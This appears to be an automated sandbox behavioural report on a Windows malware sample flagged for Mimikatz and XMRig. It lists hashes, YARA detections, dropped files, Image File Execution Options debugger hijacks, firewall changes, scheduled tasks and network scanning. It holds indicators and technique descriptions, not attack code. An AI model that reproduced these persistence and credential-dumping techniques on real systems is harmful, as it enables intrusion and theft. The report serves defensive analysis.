Analysis

max time kernel: 151s
max time network: 178s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 07-04-2024 23:27
Behavioral task: behavioral1
Sample: 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
Resource: win7-20240220-en
General

Target: 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
Size: 10.8MB
MD5: 52e2e34e9b5a6136df55f31ad0891e02
SHA1: df83b35207901fdf28714c4b95f2ebd06a2c94b8
SHA256: 1e7ee52c8a07bde261b71574bf7bbcb7bf9ce1bd2524270498aeb30869ddb0fb
SHA512: ca361c6c0f65bb6e3f1b6c68433acbd0a505e56a6b931171b808c09d5a9916c12971a306525f0be3f52ca345bd57c31cdaaf2223e8a58819cde73d6e6f45e629
SSDEEP: 98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description | pid | process | target process
  PID 1856 created 2152 | 1856 | bbleyvb.exe | spoolsv.exe

Contacts a large (26750) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 39 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/1668-0-0x0000000000400000-0x0000000000AA4000-memory.dmp | UPX
  C:\Windows\kmydietv\bbleyvb.exe | UPX
  behavioral2/memory/4952-7-0x0000000000400000-0x0000000000AA4000-memory.dmp | UPX
  C:\Windows\nzlegstrv\Corporate\vfshost.exe | UPX
  behavioral2/memory/4740-135-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp | UPX
  behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp | UPX
  C:\Windows\Temp\nzlegstrv\hmuzmiedp.exe | UPX
  behavioral2/memory/1292-140-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/1292-143-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  C:\Windows\Temp\urfucfzpe\ecfkkq.exe | UPX
  behavioral2/memory/872-147-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/3944-156-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/4860-174-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/776-180-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/760-184-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/1276-188-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/2248-197-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/2448-201-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/920-205-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/1252-210-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/4652-214-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/2024-219-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/4640-223-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/5012-228-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/5060-231-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/2264-233-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/5540-246-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/4576-248-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | UPX
  behavioral2/memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX
  behavioral2/memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | UPX

XMRig Miner payload 11 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig
  behavioral2/memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | xmrig

mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/1668-0-0x0000000000400000-0x0000000000AA4000-memory.dmp | mimikatz
  C:\Windows\kmydietv\bbleyvb.exe | mimikatz
  behavioral2/memory/4952-7-0x0000000000400000-0x0000000000AA4000-memory.dmp | mimikatz
  behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp | mimikatz

Drops file in Drivers directory 3 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | bbleyvb.exe
  File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
  File created | C:\Windows\system32\drivers\etc\hosts | bbleyvb.exe

Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
  pid | process
  1564 | netsh.exe
  1736 | netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe | bbleyvb.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" | bbleyvb.exe

Executes dropped EXE 29 IoCs
Processes:
  pid | process
  4952 | bbleyvb.exe
  1856 | bbleyvb.exe
  4960 | wpcap.exe
  4564 | lcsfzibut.exe
  4740 | vfshost.exe
  1292 | hmuzmiedp.exe
  872 | ecfkkq.exe
  3944 | hmuzmiedp.exe
  2508 | xohudmc.exe
  3860 | tyxtue.exe
  4860 | hmuzmiedp.exe
  776 | hmuzmiedp.exe
  760 | hmuzmiedp.exe
  1276 | hmuzmiedp.exe
  4224 | bbleyvb.exe
  2248 | hmuzmiedp.exe
  2448 | hmuzmiedp.exe
  920 | hmuzmiedp.exe
  1252 | hmuzmiedp.exe
  4652 | hmuzmiedp.exe
  2024 | hmuzmiedp.exe
  4640 | hmuzmiedp.exe
  5012 | hmuzmiedp.exe
  5060 | hmuzmiedp.exe
  2264 | hmuzmiedp.exe
  3044 | zbesiipnm.exe
  5540 | hmuzmiedp.exe
  4576 | hmuzmiedp.exe
  6004 | bbleyvb.exe

Loads dropped DLL 12 IoCs
Processes:
  pid | process
  4960 | wpcap.exe (9 identical entries)
  4564 | lcsfzibut.exe (3 identical entries)

Processes:
  resource | yara_rule
  C:\Windows\nzlegstrv\Corporate\vfshost.exe | upx
  behavioral2/memory/4740-135-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp | upx
  behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp | upx
  C:\Windows\Temp\nzlegstrv\hmuzmiedp.exe | upx
  behavioral2/memory/1292-140-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/1292-143-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  C:\Windows\Temp\urfucfzpe\ecfkkq.exe | upx
  behavioral2/memory/872-147-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/3944-156-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/4860-174-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/776-180-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/760-184-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/1276-188-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/2248-197-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/2448-201-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/920-205-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/1252-210-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/4652-214-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/2024-219-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/4640-223-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/5012-228-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/5060-231-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/2264-233-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/5540-246-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/4576-248-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp | upx
  behavioral2/memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx
  behavioral2/memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp | upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  66 | ifconfig.me
  67 | ifconfig.me

Creates a Windows Service

Drops file in System32 directory 18 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | bbleyvb.exe
  File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
  File created | C:\Windows\system32\wpcap.dll | wpcap.exe
  File created | C:\Windows\system32\Packet.dll | wpcap.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | bbleyvb.exe
  File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
  File opened for modification | C:\Windows\SysWOW64\tyxtue.exe | xohudmc.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | bbleyvb.exe
  File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
  File created | C:\Windows\SysWOW64\tyxtue.exe | xohudmc.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A | bbleyvb.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A | bbleyvb.exe

Drops file in Program Files directory 3 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
  File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
  File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe

Drops file in Windows directory 60 IoCs
Processes:
  description | ioc | process
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\docmicfg.xml | bbleyvb.exe
  File created | C:\Windows\kmydietv\vimpcsvc.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\Corporate\vfshost.exe | bbleyvb.exe
  File opened for modification | C:\Windows\nzlegstrv\Corporate\log.txt | cmd.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\ucl.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\docmicfg.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\Shellcode.ini | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\wpcap.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\spoolsrv.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\vimpcsvc.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\svschost.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\cnli-1.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\zlib1.dll | bbleyvb.exe
  File opened for modification | C:\Windows\nzlegstrv\yuiezklii\Result.txt | zbesiipnm.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\zbesiipnm.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\Corporate\mimilib.dll | bbleyvb.exe
  File created | C:\Windows\ime\bbleyvb.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\libxml2.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\svschost.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\posh-0.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\schoedcl.exe | bbleyvb.exe
  File created | C:\Windows\kmydietv\svschost.xml | bbleyvb.exe
  File created | C:\Windows\kmydietv\docmicfg.xml | bbleyvb.exe
  File opened for modification | C:\Windows\nzlegstrv\yuiezklii\Packet.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\exma-1.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\schoedcl.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\ssleay32.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\trch-1.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\upbdrjv\swrpwe.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\ip.txt | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe | bbleyvb.exe
  File created | C:\Windows\kmydietv\schoedcl.xml | bbleyvb.exe
  File opened for modification | C:\Windows\kmydietv\schoedcl.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\svschost.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\schoedcl.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\spoolsrv.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\Corporate\mimidrv.sys | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\tucl-1.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\spoolsrv.exe | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\vimpcsvc.xml | bbleyvb.exe
  File opened for modification | C:\Windows\kmydietv\docmicfg.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\scan.bat | bbleyvb.exe
  File created | C:\Windows\kmydietv\bbleyvb.exe | 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\crli-0.dll | bbleyvb.exe
  File created | C:\Windows\kmydietv\spoolsrv.xml | bbleyvb.exe
  File opened for modification | C:\Windows\kmydietv\svschost.xml | bbleyvb.exe
  File opened for modification | C:\Windows\kmydietv\bbleyvb.exe | 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\tibe-2.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\libeay32.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\trfo-2.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\AppCapture64.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\wpcap.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\coli-0.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\docmicfg.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\vimpcsvc.xml | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\AppCapture32.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\yuiezklii\Packet.dll | bbleyvb.exe
  File created | C:\Windows\nzlegstrv\UnattendGC\specials\xdvl-0.dll | bbleyvb.exe
  File opened for modification | C:\Windows\kmydietv\spoolsrv.xml | bbleyvb.exe
  File opened for modification | C:\Windows\kmydietv\vimpcsvc.xml | bbleyvb.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
  pid | process
  4464 | sc.exe
  1048 | sc.exe
  3492 | sc.exe
  4512 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

NSIS installer 3 IoCs
Processes:
  resource | yara_rule
  C:\Windows\kmydietv\bbleyvb.exe | nsis_installer_2
  C:\Windows\nzlegstrv\yuiezklii\wpcap.exe | nsis_installer_1
  C:\Windows\nzlegstrv\yuiezklii\wpcap.exe | nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  1736 | schtasks.exe
  2756 | schtasks.exe
  364 | schtasks.exe

Modifies data under HKEY_USERS 45 IoCs
Processes:
  description | ioc | process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | hmuzmiedp.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | hmuzmiedp.exe
